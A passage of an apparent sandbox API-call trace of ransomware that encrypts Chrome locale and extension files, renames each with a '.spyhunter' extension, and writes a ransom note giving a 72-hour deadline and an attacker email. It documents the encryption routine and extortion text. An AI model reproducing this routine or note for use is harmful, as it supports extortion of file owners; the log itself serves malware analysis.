pbData=0x31f020*, pdwDataLen=0x248e438*=0x30) returned 1 [0176.433] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fil.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.434] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak") returned 82 [0176.434] StrStrW (lpFirst="fil.pak", lpSrch=".txt") returned 0x0 [0176.434] GetProcessHeap () returned 0x2c0000 [0176.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.434] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0176.442] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.442] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0176.442] GetProcessHeap () returned 0x2c0000 [0176.442] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.442] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.442] WriteFile (in: hFile=0xb0, lpBuffer=0x248e43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x248e43c*, lpNumberOfBytesWritten=0x248e3fc*=0x4, lpOverlapped=0x0) returned 1 [0176.444] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3fc*=0x30, lpOverlapped=0x0) returned 1 [0176.444] CloseHandle (hObject=0xb0) returned 1 [0176.444] GetProcessHeap () returned 0x2c0000 [0176.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.445] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak.spyhunter") returned 92 [0176.445] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fil.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fil.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fil.pak.spyhunter")) returned 1 [0176.445] GetProcessHeap () returned 0x2c0000 [0176.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.445] GetProcessHeap () returned 0x2c0000 [0176.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.446] GetProcessHeap () returned 0x2c0000 [0176.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc830 | out: hHeap=0x2c0000) returned 1 [0176.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e440 | out: pbBuffer=0x248e440) returned 1 [0176.446] GetProcessHeap () returned 0x2c0000 [0176.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e438*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e438*=0x30) returned 1 [0176.446] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fa.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0176.447] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak") returned 81 [0176.447] StrStrW (lpFirst="fa.pak", lpSrch=".txt") returned 0x0 [0176.447] GetProcessHeap () returned 0x2c0000 [0176.447] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.447] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0176.570] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.570] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e3fc*=0x2800, lpOverlapped=0x0) returned 1 [0176.570] GetProcessHeap () returned 0x2c0000 [0176.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.570] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.570] WriteFile (in: hFile=0xb0, lpBuffer=0x248e43c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x248e43c*, lpNumberOfBytesWritten=0x248e3fc*=0x4, lpOverlapped=0x0) returned 1 [0176.573] WriteFile (in: hFile=0xb0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3fc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3fc*=0x30, lpOverlapped=0x0) returned 1 [0176.573] CloseHandle (hObject=0xb0) returned 1 [0176.591] GetProcessHeap () returned 0x2c0000 [0176.591] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.591] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak.spyhunter") returned 91 [0176.591] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fa.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\fa.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\fa.pak.spyhunter")) returned 1 [0176.593] GetProcessHeap () returned 0x2c0000 [0176.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.593] GetProcessHeap () returned 0x2c0000 [0176.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.593] GetProcessHeap () returned 0x2c0000 [0176.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc650 | out: hHeap=0x2c0000) returned 1 [0176.593] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e438 | out: pbBuffer=0x248e438) returned 1 [0176.593] GetProcessHeap () returned 0x2c0000 [0176.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.593] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e430*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e430*=0x30) returned 1 [0176.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.594] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak") returned 81 [0176.594] StrStrW (lpFirst="es.pak", lpSrch=".txt") returned 0x0 [0176.594] GetProcessHeap () returned 0x2c0000 [0176.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0176.594] ReadFile (in: hFile=0x9c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248e3f4*=0x2800, lpOverlapped=0x0) returned 1 [0176.597] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.597] WriteFile (in: hFile=0x9c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248e3f4*=0x2800, lpOverlapped=0x0) returned 1 [0176.597] GetProcessHeap () returned 0x2c0000 [0176.597] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0176.597] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.597] WriteFile (in: hFile=0x9c, lpBuffer=0x248e434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x248e434*, lpNumberOfBytesWritten=0x248e3f4*=0x4, lpOverlapped=0x0) returned 1 [0176.599] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3f4*=0x30, lpOverlapped=0x0) returned 1 [0176.599] CloseHandle (hObject=0x9c) returned 1 [0176.599] GetProcessHeap () returned 0x2c0000 [0176.599] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.599] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak.spyhunter") returned 91 [0176.599] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\es.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\es.pak.spyhunter")) returned 1 [0176.623] GetProcessHeap () returned 0x2c0000 [0176.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.623] GetProcessHeap () returned 0x2c0000 [0176.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.624] GetProcessHeap () returned 0x2c0000 [0176.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecc470 | out: hHeap=0x2c0000) returned 1 [0176.624] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e438 | out: pbBuffer=0x248e438) returned 1 [0176.624] GetProcessHeap () returned 0x2c0000 [0176.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.624] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e430*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e430*=0x30) returned 1 [0176.624] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-us.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0176.707] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak") returned 84 [0176.707] StrStrW (lpFirst="en-US.pak", lpSrch=".txt") returned 0x0 [0176.707] GetProcessHeap () returned 0x2c0000 [0176.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0176.707] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e3f4*=0x2800, lpOverlapped=0x0) returned 1 [0176.708] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.708] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e3f4*=0x2800, lpOverlapped=0x0) returned 1 [0176.708] GetProcessHeap () returned 0x2c0000 [0176.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0176.708] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.709] WriteFile (in: hFile=0x178, lpBuffer=0x248e434*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x248e434*, lpNumberOfBytesWritten=0x248e3f4*=0x4, lpOverlapped=0x0) returned 1 [0176.716] WriteFile (in: hFile=0x178, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3f4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3f4*=0x30, lpOverlapped=0x0) returned 1 [0176.717] CloseHandle (hObject=0x178) returned 1 [0176.730] GetProcessHeap () returned 0x2c0000 [0176.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.730] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak.spyhunter") returned 94 [0176.730] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-us.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\en-US.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\en-us.pak.spyhunter")) returned 1 [0176.732] GetProcessHeap () returned 0x2c0000 [0176.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.732] GetProcessHeap () returned 0x2c0000 [0176.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.732] GetProcessHeap () returned 0x2c0000 [0176.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eca2b8 | out: hHeap=0x2c0000) returned 1 [0176.732] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e430 | out: pbBuffer=0x248e430) returned 1 [0176.732] GetProcessHeap () returned 0x2c0000 [0176.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.732] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e428*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e428*=0x30) returned 1 [0176.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ar.pak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.733] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak") returned 81 [0176.733] StrStrW (lpFirst="ar.pak", lpSrch=".txt") returned 0x0 [0176.733] GetProcessHeap () returned 0x2c0000 [0176.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.733] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e3ec*=0x2800, lpOverlapped=0x0) returned 1 [0176.837] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.837] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248e3ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e3ec*=0x2800, lpOverlapped=0x0) returned 1 [0176.838] GetProcessHeap () returned 0x2c0000 [0176.838] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.838] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.838] WriteFile (in: hFile=0x9c, lpBuffer=0x248e42c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3ec, lpOverlapped=0x0 | out: lpBuffer=0x248e42c*, lpNumberOfBytesWritten=0x248e3ec*=0x4, lpOverlapped=0x0) returned 1 [0176.840] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3ec, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3ec*=0x30, lpOverlapped=0x0) returned 1 [0176.840] CloseHandle (hObject=0x9c) returned 1 [0176.840] GetProcessHeap () returned 0x2c0000 [0176.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.840] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak.spyhunter") returned 91 [0176.840] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ar.pak"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\ar.pak.spyhunter" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\ar.pak.spyhunter")) returned 1 [0176.842] GetProcessHeap () returned 0x2c0000 [0176.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0176.842] GetProcessHeap () returned 0x2c0000 [0176.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0176.842] GetProcessHeap () returned 0x2c0000 [0176.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa1e0 | out: hHeap=0x2c0000) returned 1 [0176.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.843] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0176.843] WriteFile (in: hFile=0x9c, lpBuffer=0x248e363*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x248e363*, lpNumberOfBytesWritten=0x248e48c*=0x127, lpOverlapped=0x0) returned 1 [0176.844] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0176.844] WriteFile (in: hFile=0x9c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e48c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e48c*=0x2ac, lpOverlapped=0x0) returned 1 [0176.844] CloseHandle (hObject=0x9c) returned 1 [0176.844] GetProcessHeap () returned 0x2c0000 [0176.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4e608 | out: hHeap=0x2c0000) returned 1 [0176.845] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e428 | out: pbBuffer=0x248e428) returned 1 [0176.845] GetProcessHeap () returned 0x2c0000 [0176.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0176.845] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e420*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e420*=0x30) returned 1 [0176.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\external_extensions.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0176.846] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json") returned 102 [0176.847] StrStrW (lpFirst="external_extensions.json", lpSrch=".txt") returned 0x0 [0176.847] GetProcessHeap () returned 0x2c0000 [0176.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0176.847] ReadFile (in: hFile=0x9c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248e3e4*=0x63, lpOverlapped=0x0) returned 1 [0176.848] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffff9d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0176.848] WriteFile (in: hFile=0x9c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x63, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248e3e4*=0x63, lpOverlapped=0x0) returned 1 [0176.848] GetProcessHeap () returned 0x2c0000 [0176.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0176.848] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0176.848] WriteFile (in: hFile=0x9c, lpBuffer=0x248e424*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x248e424*, lpNumberOfBytesWritten=0x248e3e4*=0x4, lpOverlapped=0x0) returned 1 [0176.848] WriteFile (in: hFile=0x9c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e3e4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e3e4*=0x30, lpOverlapped=0x0) returned 1 [0176.848] CloseHandle (hObject=0x9c) returned 1 [0176.848] GetProcessHeap () returned 0x2c0000 [0176.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0176.849] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\external_extensions.json.spyhunter") returned 112 [0176.849] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files 